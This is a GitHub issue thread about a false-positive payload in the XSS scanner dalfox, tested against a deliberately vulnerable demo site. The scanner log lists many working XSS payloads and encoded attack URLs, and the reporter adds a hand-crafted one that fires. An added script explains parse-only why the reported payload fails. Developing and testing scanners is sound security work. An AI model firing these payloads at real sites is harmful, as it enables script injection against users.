
Payload fails in valid XSS #49

Closed
bsysop opened this issue Apr 27, 2020 · 5 comments
Labels: bug, payload

bsysop commented Apr 27, 2020

Hi my man! Testing your awesome tool!

It looks like it perfectly found the XSS, but with the wrong payload; take a look.

Just to show it is an updated version:

dalfox bsysop$ git status
On branch master
Your branch is up to date with 'origin/master'.

dalfox url "http://testphp.vulnweb.com/listproducts.php?cat=123&artist=123&asdf=ff"

    _..._
  .' .::::.   __   _   _    ___ _ __ __
 :  :::::::: |  \ / \ | |  | __/ \\ V /
 :  :::::::: | o ) o || |_ | _( o )) (
 '. '::::::' |__/|_n_||___||_| \_//_n_\
   '-.::''

Parameter Analysis and XSS Scanning tool based on golang
Finder Of XSS and Dal is the Korean pronunciation of moon. @hahwul
[*] Using single target mode
[*] Target URL: http://testphp.vulnweb.com/listproducts.php?cat=123&artist=123&asdf=ff
[*] Vaild target [ code:200 / size:4699 ]
[*] Start parameter analysis.. 🔍
[*] Start static analysis.. 🔍
[I] Content-Type is text/html
[I] Reflected cat param => inHTML[1]   $
    48 line:  	Error: Unknown column '123DalFox' in 'where cl
[*] Generate XSS payload and optimization.Optimization.. 🛠
[*] Added your blind XSS (https://vrsky.xss.ht)
[*] Start XSS Scanning.. with 149 queries 🗡
[W] Reflected Payload in HTML: cat="><iFrAme/src=jaVascRipt:alert(45)></iFramE>
    48 line:  syntax to use near '"><iFrAme/src=jaVascRipt:alert(45)></iFramE>' at line 1
    +> http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=123%22%3E%3CiFrAme%2Fsrc%3DjaVascRipt%3Aalert%2845%29%3E%3C%2FiFramE%3E
[W] Reflected Payload in HTML: cat="><SvG/onload=alert(45) id=dalfox>
    48 line:  syntax to use near '"><SvG/onload=alert(45) id=dalfox>' at line 1
    +> http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=123%22%3E%3CSvG%2Fonload%3Dalert%2845%29+id%3Ddalfox%3E
[W] Reflected Payload in HTML: cat='>asd
    48 line:  syntax to use near ''>asd' at line 1
    +> http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=123%27%3Easd
[W] Reflected Payload in HTML: cat="><svg/OnLoad="`${prompt``}`">
    48 line:  syntax to use near '"><svg/OnLoad="`${prompt``}`">' at line 1
    +> http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=123%22%3E%3Csvg%2FOnLoad%3D%22%60%24%7Bprompt%60%60%7D%60%22%3E
[W] Reflected Payload in HTML: cat="><d3"<"/onclick="45 class=dalfox>[confirm``]"<">z
    48 line:  syntax to use near '"><d3"<"/onclick="45 class=dalfox>[confirm``]"<">z' at line
    +> http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=123%22%3E%3Cd3%22%3C%22%2Fonclick%3D%2245+class%3Ddalfox%3E%5Bconfirm%60%60%5D%22%3C%22%3Ez
[W] Reflected Payload in HTML: cat='"><img/src/onerror=.1|alert``>
    48 line:  syntax to use near ''"><img/src/onerror=.1|alert``>' at line 1
    +> http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=123%27%22%3E%3Cimg%2Fsrc%2Fonerror%3D.1%7Calert%60%60%3E
[W] Reflected Payload in HTML: cat="><script/"<a"/src=data:=".<a,[45].some(confirm)>
    48 line:  syntax to use near '"><script/"<a"/src=data:=".<a,[45].some(confirm)>' at line 1
    +> http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=123%22%3E%3Cscript%2F%22%3Ca%22%2Fsrc%3Ddata%3A%3D%22.%3Ca%2C%5B45%5D.some%28confirm%29%3E
[W] Reflected Payload in HTML: cat="><w="/x="y>"/class=dalfox/ondblclick=`<`[confirm``]>z
    48 line:  syntax to use near '"><w="/x="y>"/class=dalfox/ondblclick=`<`[confirm``]>z' at l
    +> http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=123%22%3E%3Cw%3D%22%2Fx%3D%22y%3E%22%2Fclass%3Ddalfox%2Fondblclick%3D%60%3C%60%5Bconfirm%60%60%5D%3Ez
[V] Triggered XSS Payload (found DOM Object): cat=</script><svg><script/class=dalfox>alert(45)-%26apos%3B

    +> http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=123%3C%2Fscript%3E%3Csvg%3E%3Cscript%2Fclass%3Ddalfox%3Ealert%2845%29-%26apos%3B
[*] Finish :D

Until now it is good; it says we found an XSS there. Let's take a look:

[V] Triggered XSS Payload (found DOM Object): cat=</script><svg><script/class=dalfox>alert(45)-%26apos%3B

So it will be:

http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=%3C/script%3E%3Csvg%3E%3Cscript/class=dalfox%3Ealert(45)-%26apos%3B

[Screenshot 2020-04-27 at 11:43:17]

But that doesn't pop the XSS.

I just changed it a little to confirm it is a valid find.

http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=123%3C%2Fscript%3E%3Cscript%3Ealert%2845%29;%3C/script%3E/*

[Screenshot 2020-04-27 at 11:43:46]

Thanks mate.

PS: It would be very nice to have a "dalfox -v" to show the version; when people open issues they can always send it to show they have the updated version, which saves your time with wrong issues.
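The scanner output above marks the payload as verified because it found the injected element in the DOM, while the reporter's browser test shows that nothing executes. An added illustration (not from the issue and not dalfox code) of why those two signals differ: the reflection sits inside an SQL error message, so the text that follows the injected `<script/class=dalfox>` is `-&apos;' at line 1...`, which is not valid JavaScript, whereas the hand-crafted `alert(45);</script>/*` closes its own script body. The check below models that with a constructed copy of the error line, extracts what a browser would hand to the JS engine (an approximation: text up to the next `</script>` or the end of the document, with character references decoded because the reported script sits in `<svg>` foreign content), and parses it with `new Function`, which compiles without running, so no alert fires. `reflectedLine`, `scriptBodies`, `compiles` and `anyScriptCompiles` are names chosen here, not tool APIs.

```javascript
// Added example (not part of the issue or of dalfox): a parse-only check that
// separates "the injected element exists in the DOM" from "the injected script
// is something a JS engine would accept". Run with: node check.js

// Constructed sample of the reflected line, modelled on the SQL error message
// quoted in the issue ("... syntax to use near '<input>' at line 1").
function reflectedLine(payload) {
  return "<div>Error: You have an error in your SQL syntax; " +
         "check the manual for the right syntax to use near '123" + payload +
         "' at line 1</div>";
}

// Decode the character references that matter here. Assumption: the page emits
// them literally (the reported URL carries a percent-encoded "&apos;"), and the
// browser decodes them because the script sits inside <svg> foreign content.
function decodeEntities(s) {
  return s.replace(/&apos;/g, "'").replace(/&quot;/g, '"')
          .replace(/&lt;/g, "<").replace(/&gt;/g, ">").replace(/&amp;/g, "&");
}

// Approximate what a browser would hand to the JS engine: the text of each
// <script ...> element up to the next </script>, or to the end of the document
// when the injected script never gets a closing tag.
function scriptBodies(html) {
  const openTag = /<script\b[^>]*>([\s\S]*?)(?=<\/script>|$)/gi;
  const bodies = [];
  let m;
  while ((m = openTag.exec(html)) !== null) bodies.push(decodeEntities(m[1]));
  return bodies;
}

// new Function() parses the source without running it, so alert() never fires.
function compiles(src) {
  try { new Function(src); return true; } catch (e) { return false; }
}

// True when at least one injected script body is syntactically valid JavaScript.
function anyScriptCompiles(html) {
  return scriptBodies(html).some(compiles);
}

// The payload dalfox reported as verified and the one the reporter hand-crafted,
// both URL-decoded from the issue ("123" is the original cat value).
const TOOL_PAYLOAD = "</script><svg><script/class=dalfox>alert(45)-&apos;";
const MANUAL_PAYLOAD = "</script><script>alert(45);</script>/*";

for (const [name, p] of [["dalfox", TOOL_PAYLOAD], ["manual", MANUAL_PAYLOAD]]) {
  const html = reflectedLine(p);
  console.log(name, "script bodies:", JSON.stringify(scriptBodies(html)),
              "-> compiles:", anyScriptCompiles(html));
}
```

The takeaway for triage is that a "found DOM object" result proves the parameter is injectable into markup, which is already the vulnerability to fix (escape the error text before echoing it), while a payload that actually fires needs a script body that survives the surrounding text, so a reported payload is worth re-checking in a browser before it is pasted into a report.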

bsysop commented Apr 27, 2020

I ran it again and it gave me a different payload, that's awesome!

[Screenshot 2020-04-27 at 11:56:26]

hahwul commented Apr 27, 2020

Hi @bsysop
Well, first of all, I need to fix that payload. (It is a WAF-bypassing payload, but I think we should increase the probability of triggering.)

I'll commit and reflect it when it's modified! And the version option will be added with the update option at the release! (Maybe this weekend)

Thank you so much for your good opinion, my friend :D

hahwul commented Apr 27, 2020

Oh, and to prevent too many reflected logs, I've been blocking the checking of that parameter once verify was successful, so the payload found will be different for each test case.

The important thing is that the parameter is vulnerable lol

@hahwul hahwul added the bug and payload labels Apr 27, 2020
@hahwul hahwul self-assigned this Apr 27, 2020
@hahwul hahwul closed this as completed in 1b30541 Apr 27, 2020
bsysop commented Apr 27, 2020

100% agree! Most important feature is detection!

Thank you very much, brother; I'll tell you when I finish my tests.

hahwul commented Apr 27, 2020

Thank you so much for always helping me a lot 👍
